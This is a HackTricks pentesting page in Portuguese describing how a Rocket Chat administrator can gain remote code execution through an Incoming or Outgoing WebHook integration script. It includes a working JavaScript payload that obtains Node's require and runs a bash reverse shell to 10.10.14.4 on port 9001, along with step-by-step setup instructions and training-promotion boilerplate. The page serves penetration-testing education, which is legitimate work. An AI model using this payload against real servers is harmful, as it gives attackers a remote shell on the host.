hacktricks/network-services-pentesting/pentesting-web/rocket-chat.md

4 KiB

Rocket Chat

{% hint style="success" %} Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %} {% endhint %}

{% embed url="https://websec.nl/" %}

RCE

Se você for admin dentro do Rocket Chat, pode obter RCE.

  • Vá para Integrations e selecione New Integration e escolha qualquer um: Incoming WebHook ou Outgoing WebHook.
  • /admin/integrations/incoming
const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
  • Configure o WebHook (o canal e a postagem como nome de usuário devem existir):
  • Configure o script do WebHook:
  • Salve as alterações
  • Obtenha a URL do WebHook gerada:
  • Chame-a com curl e você deve receber o rev shell

{% embed url="https://websec.nl/" %} {% hint style="success" %} Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %} {% endhint %}